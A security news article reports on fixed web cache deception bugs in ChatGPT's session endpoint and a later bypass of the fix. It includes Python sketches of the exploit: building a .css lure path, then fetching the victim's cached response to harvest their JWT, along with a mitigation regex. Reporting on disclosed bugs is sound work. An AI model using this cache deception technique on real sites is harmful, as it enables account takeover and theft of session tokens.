OpenAI quickly fixed account takeover bugs in ChatGPT

OpenAI addressed multiple severe vulnerabilities in the popular chatbot ChatGPT that could have allowed attackers to take over user accounts and view chat histories.

One of the issues was a “Web Cache Deception” vulnerability, reported by bug bounty hunter and Shockwave founder Gal Nagli, that could lead to an account takeover.

The expert discovered the vulnerability while analyzing the requests that handle ChatGPT’s authentication flow. The following GET request caught the attention of the expert:

https://chat.openai[.]com/api/auth/session

“Basically, whenever we login to our ChatGPT instance, the application will fetch our account context, as in our Email, Name, Image and accessToken from the server, it looks like the attached image below,” Nagli wrote in a Twitter thread detailing the bug.
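For illustration, the snippet below fetches that account context for a logged-in user. The endpoint URL comes from the article; the cookie name (a typical NextAuth.js session cookie) and the exact response fields are assumptions, shown only to make the description concrete.

```python
# Illustrative sketch: fetch your own account context from the session endpoint.
# The cookie name and response field names are assumptions, not confirmed by OpenAI.
import requests

SESSION_URL = "https://chat.openai.com/api/auth/session"

def fetch_session(session_cookie: str) -> dict:
    """Return the account context (email, name, image, accessToken) for a logged-in user."""
    resp = requests.get(
        SESSION_URL,
        cookies={"__Secure-next-auth.session-token": session_cookie},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

if __name__ == "__main__":
    data = fetch_session("<your-session-cookie>")
    # Typical fields: user.email, user.name, user.image, and accessToken (a JWT)
    print(data.get("user", {}), str(data.get("accessToken", ""))[:20], "...")
```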

The expert explained that to exploit the flaw, a threat actor can craft a dedicated .css path under the session endpoint (/api/auth/session) and send the link to the victim. When the victim visits the link, the caching server stores the response, and the attacker can then retrieve the cached copy to harvest the victim’s JWT credentials and take full control of their account.
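The sketch below outlines that flow against the now-fixed bug. The path suffix and content-type check are illustrative assumptions; the actual exploit depended on how OpenAI’s CDN inferred cacheability from the URL’s apparent extension.

```python
# Minimal sketch of the web cache deception flow described above (since fixed).
# The "/victim.css" suffix is an illustrative assumption.
import requests

BASE = "https://chat.openai.com/api/auth/session"

def craft_lure(suffix: str = "victim.css") -> str:
    # The session endpoint ignores the extra path segment, but a cache layer
    # keyed on the ".css" extension may store the JSON response it returns.
    return f"{BASE}/{suffix}"

def attacker_fetch(lure_url: str) -> dict | None:
    # After the authenticated victim opens the lure, the attacker requests the
    # same URL with no credentials; a cache hit returns the victim's data.
    resp = requests.get(lure_url, timeout=10)
    if resp.ok and resp.headers.get("content-type", "").startswith("application/json"):
        return resp.json()  # would have contained email, name and the accessToken (JWT)
    return None

if __name__ == "__main__":
    lure = craft_lure()
    print("Link sent to victim:", lure)
    print("Cached response:", attacker_fetch(lure))
```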

Nagli praised the OpenAI security team, which quickly addressed the issue by instructing the caching server, via a regex, not to cache the endpoint.
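Conceptually, the fix means cacheability is decided by an explicit exclusion rule rather than by the apparent file extension alone. The regex and extension list below are assumptions used to sketch the idea; the article only states that the caching server was told to skip the endpoint through a regex.

```python
# Sketch of the mitigation: an exclusion regex overrides extension-based caching.
# Both regexes are illustrative assumptions, not OpenAI's actual configuration.
import re

NEVER_CACHE = re.compile(r"^/api/auth/session(/.*)?$")
STATIC_EXT = re.compile(r"\.(css|js|png|jpg|svg|woff2?)$", re.IGNORECASE)

def is_cacheable(path: str) -> bool:
    if NEVER_CACHE.match(path):
        return False  # session endpoint is never cached, even as ".../x.css"
    return bool(STATIC_EXT.search(path))

assert is_cacheable("/static/app.css") is True
assert is_cacheable("/api/auth/session") is False
assert is_cacheable("/api/auth/session/victim.css") is False  # lure path no longer cached
```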

The bad news is that the mitigation implemented by the company only partially addressed the issue. Researcher Ayoub Fathi discovered that it is possible to bypass authentication by targeting another ChatGPT API with the same technique; an attacker could exploit this bypass to access a user’s conversation titles.
